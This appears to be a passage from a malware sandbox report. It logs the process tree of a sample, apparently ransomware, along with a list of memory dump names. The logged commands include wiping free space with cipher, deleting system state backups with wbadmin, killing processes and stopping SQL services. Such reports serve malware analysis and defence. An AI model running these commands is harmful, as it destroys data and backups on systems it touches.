C:\Windows\SysWOW64\cipher.execipher /w:\\?\C:3⤵
-
C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe\\?\C:\Users\Admin\AppData\Local\Temp\64new_cip8.exe -network2⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2616 -s 34842⤵
- Program crash
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 2616 -ip 26161⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest1⤵
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Deletes System State backups
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 184 -p 4020 -ip 40201⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4020 -s 9361⤵
- Program crash
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/220-148-0x0000000000000000-mapping.dmp
-
memory/240-147-0x0000000000000000-mapping.dmp
-
memory/604-145-0x0000000000000000-mapping.dmp
-
memory/608-178-0x0000000000000000-mapping.dmp
-
memory/664-143-0x0000000000000000-mapping.dmp
-
memory/796-174-0x0000000000000000-mapping.dmp
-
memory/860-163-0x0000000000000000-mapping.dmp
-
memory/920-179-0x0000000000000000-mapping.dmp
-
memory/1032-164-0x0000000000000000-mapping.dmp
-
memory/1144-176-0x0000000000000000-mapping.dmp
-
memory/1184-162-0x0000000000000000-mapping.dmp
-
memory/1248-161-0x0000000000000000-mapping.dmp
-
memory/1324-141-0x0000000000000000-mapping.dmp
-
memory/1528-135-0x0000000000000000-mapping.dmp
-
memory/1600-192-0x0000000000000000-mapping.dmp
-
memory/1644-146-0x0000000000000000-mapping.dmp
-
memory/1844-152-0x0000000000000000-mapping.dmp
-
memory/1912-189-0x0000000000000000-mapping.dmp
-
memory/2016-144-0x0000000000000000-mapping.dmp
-
memory/2020-177-0x0000000000000000-mapping.dmp
-
memory/2044-142-0x0000000000000000-mapping.dmp
-
memory/2084-185-0x0000000000000000-mapping.dmp
-
memory/2084-133-0x0000000000000000-mapping.dmp
-
memory/2156-156-0x0000000000000000-mapping.dmp
-
memory/2176-155-0x0000000000000000-mapping.dmp
-
memory/2240-171-0x0000000000000000-mapping.dmp
-
memory/2356-170-0x0000000000000000-mapping.dmp
-
memory/2440-183-0x0000000000000000-mapping.dmp
-
memory/2548-186-0x0000000000000000-mapping.dmp
-
memory/2584-193-0x0000000000000000-mapping.dmp
-
memory/2644-149-0x0000000000000000-mapping.dmp
-
memory/2768-165-0x0000000000000000-mapping.dmp
-
memory/2784-181-0x0000000000000000-mapping.dmp
-
memory/2860-172-0x0000000000000000-mapping.dmp
-
memory/3104-160-0x0000000000000000-mapping.dmp
-
memory/3428-169-0x0000000000000000-mapping.dmp
-
memory/3440-158-0x0000000000000000-mapping.dmp
-
memory/3468-173-0x0000000000000000-mapping.dmp
-
memory/3588-166-0x0000000000000000-mapping.dmp
-
memory/3760-138-0x0000000000000000-mapping.dmp
-
memory/3840-153-0x0000000000000000-mapping.dmp
-
memory/3932-190-0x0000000000000000-mapping.dmp
-
memory/3932-134-0x0000000000000000-mapping.dmp
-
memory/4036-182-0x0000000000000000-mapping.dmp
-
memory/4072-151-0x0000000000000000-mapping.dmp
-
memory/4160-140-0x0000000000000000-mapping.dmp
-
memory/4200-132-0x0000000000000000-mapping.dmp
-
memory/4240-150-0x0000000000000000-mapping.dmp
-
memory/4376-159-0x0000000000000000-mapping.dmp
-
memory/4400-168-0x0000000000000000-mapping.dmp
-
memory/4460-154-0x0000000000000000-mapping.dmp
-
memory/4604-184-0x0000000000000000-mapping.dmp
-
memory/4628-195-0x0000000000000000-mapping.dmp
-
memory/4644-191-0x0000000000000000-mapping.dmp
-
memory/4668-194-0x0000000000000000-mapping.dmp
-
memory/4724-137-0x0000000000000000-mapping.dmp
-
memory/4744-188-0x0000000000000000-mapping.dmp
-
memory/4748-136-0x0000000000000000-mapping.dmp
-
memory/4860-180-0x0000000000000000-mapping.dmp
-
memory/4876-167-0x0000000000000000-mapping.dmp
-
memory/4892-139-0x0000000000000000-mapping.dmp
-
memory/4932-187-0x0000000000000000-mapping.dmp
-
memory/5072-157-0x0000000000000000-mapping.dmp
-
memory/5092-175-0x0000000000000000-mapping.dmp